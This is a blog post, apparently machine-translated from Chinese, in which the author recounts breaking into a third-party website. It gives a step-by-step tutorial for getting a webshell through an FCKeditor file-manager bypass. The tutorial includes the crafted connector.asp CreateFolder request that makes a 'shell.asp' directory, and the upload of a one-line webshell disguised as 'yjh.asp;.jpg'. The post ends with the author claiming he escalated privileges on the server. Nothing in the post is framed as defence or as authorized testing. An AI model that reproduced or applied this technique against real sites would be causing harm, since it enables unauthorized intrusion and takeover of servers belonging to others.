Today, I was going to set up a station. After doing some research on this station, I found that there was no exploitable loophole in this station. At this time, I felt a bit of pain, so I wanted to find a side station to raise my power. I scanned a few sites on the side station, and finally I logged into the backstage of a station and looked at it in the backstage, I found that it was an FCK editor. I was a bit hopeful. I immediately thought of creating folders with the breakthrough of FCK loophole Try it. Now I will write down the method of getting the shell in the background of FCK breakthrough folder creation. There are many such tutorials in Baidu. Now I'd better write a slightly detailed one.
Find a place to add news, click Upload Picture → Browse Server, as shown below:
Then create a new folder named qxz.asp As shown below:
But it was automatically named as qxz_asp As shown below:
Next, we will use the bypass code to break through. The code is as follows:
FCKeditor/editor/filemanager/connectors/asp/connector.asp? Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
Add the above code to the website link and press Enter. For example: http://www.xxx.com/ FCKeditor/editor/filemanager/connectors/asp/connector.asp? Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
OK succeeded
Then close this page and click Add Image Browsing Server again. Automatically created a shell.asp Folder for
Then change the name of a sentence to yjh.asp;. jpg Upload a sentence to this folder.
OK kitchen knife link address http://www.xxx . com/ Upload/image/shell.asp/yjh_asp;. jpg
Finally, I went to Malaysia and finally got the server after a fight to raise the power. It was getting late, so I stopped writing about the process of raising the power.
Original article reprint please specify: reprint from Seven Travelers Blog
Fixed link of this article: https://www.qxzxp.com/3961.html